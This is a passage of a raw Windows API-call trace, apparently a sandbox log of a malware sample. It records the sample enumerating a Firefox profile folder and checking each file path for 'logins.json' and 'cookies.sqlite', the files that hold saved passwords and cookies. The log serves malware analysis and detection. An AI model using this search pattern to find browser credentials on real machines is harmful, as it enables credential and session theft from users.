HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="logins.json") returned 0x0 [0161.151] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="cookies.sqlite") returned 0x0 [0161.151] VirtualQuery (in: lpAddress=0x925530, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.151] GetProcessHeap () returned 0x8e0000 [0161.151] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925530 | out: hHeap=0x8e0000) returned 1 [0161.151] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0161.151] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0161.151] VirtualQuery (in: lpAddress=0x924ea8, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.151] GetProcessHeap () returned 0x8e0000 [0161.151] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924ea8 | out: hHeap=0x8e0000) returned 1 [0161.151] VirtualQuery (in: lpAddress=0x924db0, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.151] GetProcessHeap () returned 0x8e0000 [0161.151] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924db0 | out: hHeap=0x8e0000) returned 1 [0161.151] VirtualQuery (in: lpAddress=0x924cb8, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.151] GetProcessHeap () returned 0x8e0000 [0161.151] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924cb8 | out: hHeap=0x8e0000) returned 1 [0161.151] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.151] lstrlenW (lpString="\\") returned 1 [0161.151] GetProcessHeap () returned 0x8e0000 [0161.151] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x924be8 [0161.151] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.151] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.151] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0161.151] lstrlenW (lpString="moz-safe-about+home") returned 19 [0161.151] GetProcessHeap () returned 0x8e0000 [0161.151] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x924cb8 [0161.151] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.151] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.151] VirtualQuery (in: lpAddress=0x924be8, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.151] GetProcessHeap () returned 0x8e0000 [0161.151] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924be8 | out: hHeap=0x8e0000) returned 1 [0161.151] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="logins.json") returned 0x0 [0161.151] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="cookies.sqlite") returned 0x0 [0161.152] VirtualQuery (in: lpAddress=0x924cb8, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.152] GetProcessHeap () returned 0x8e0000 [0161.152] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924cb8 | out: hHeap=0x8e0000) returned 1 [0161.152] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 0 [0161.152] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0161.152] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.152] GetProcessHeap () returned 0x8e0000 [0161.152] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.152] VirtualQuery (in: lpAddress=0x924b18, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.152] GetProcessHeap () returned 0x8e0000 [0161.152] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924b18 | out: hHeap=0x8e0000) returned 1 [0161.152] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.152] GetProcessHeap () returned 0x8e0000 [0161.152] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.152] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.152] lstrlenW (lpString="\\") returned 1 [0161.152] GetProcessHeap () returned 0x8e0000 [0161.152] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.152] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.152] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.152] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.152] lstrlenW (lpString="indexedDB") returned 9 [0161.152] GetProcessHeap () returned 0x8e0000 [0161.152] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924a48 [0161.152] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.152] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.152] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.152] GetProcessHeap () returned 0x8e0000 [0161.152] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.152] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="logins.json") returned 0x0 [0161.152] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="cookies.sqlite") returned 0x0 [0161.152] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.152] GetProcessHeap () returned 0x8e0000 [0161.153] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.153] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4815eb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4815eb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="key3.db", cAlternateFileName="")) returned 1 [0161.153] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.153] lstrlenW (lpString="\\") returned 1 [0161.153] GetProcessHeap () returned 0x8e0000 [0161.153] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.153] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.153] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.153] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.153] lstrlenW (lpString="key3.db") returned 7 [0161.153] GetProcessHeap () returned 0x8e0000 [0161.153] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x924a48 [0161.153] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.153] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="key3.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" [0161.153] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.153] GetProcessHeap () returned 0x8e0000 [0161.153] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.153] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="logins.json") returned 0x0 [0161.153] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="cookies.sqlite") returned 0x0 [0161.153] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.153] GetProcessHeap () returned 0x8e0000 [0161.153] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.153] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x850d63f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x850d63f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x850d63f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x501, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="localstore.rdf", cAlternateFileName="LOCALS~1.RDF")) returned 1 [0161.153] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.153] lstrlenW (lpString="\\") returned 1 [0161.153] GetProcessHeap () returned 0x8e0000 [0161.153] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.153] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.153] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.153] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.153] lstrlenW (lpString="localstore.rdf") returned 14 [0161.153] GetProcessHeap () returned 0x8e0000 [0161.153] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.153] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.153] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="localstore.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" [0161.154] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.154] GetProcessHeap () returned 0x8e0000 [0161.154] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.154] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="logins.json") returned 0x0 [0161.154] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="cookies.sqlite") returned 0x0 [0161.154] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.154] GetProcessHeap () returned 0x8e0000 [0161.154] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.154] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6518ad0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x85572e90, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x39, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="marionette.log", cAlternateFileName="MARION~1.LOG")) returned 1 [0161.154] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.154] lstrlenW (lpString="\\") returned 1 [0161.154] GetProcessHeap () returned 0x8e0000 [0161.154] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.154] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.154] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.154] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.154] lstrlenW (lpString="marionette.log") returned 14 [0161.154] GetProcessHeap () returned 0x8e0000 [0161.154] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.154] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.154] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="marionette.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" [0161.154] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.154] GetProcessHeap () returned 0x8e0000 [0161.154] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.154] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="logins.json") returned 0x0 [0161.154] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="cookies.sqlite") returned 0x0 [0161.154] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.154] GetProcessHeap () returned 0x8e0000 [0161.154] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.154] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb50b6e70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5175550, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb5175550, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xef3, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="mimeTypes.rdf", cAlternateFileName="MIMETY~1.RDF")) returned 1 [0161.154] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.154] lstrlenW (lpString="\\") returned 1 [0161.154] GetProcessHeap () returned 0x8e0000 [0161.154] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.155] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.155] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: 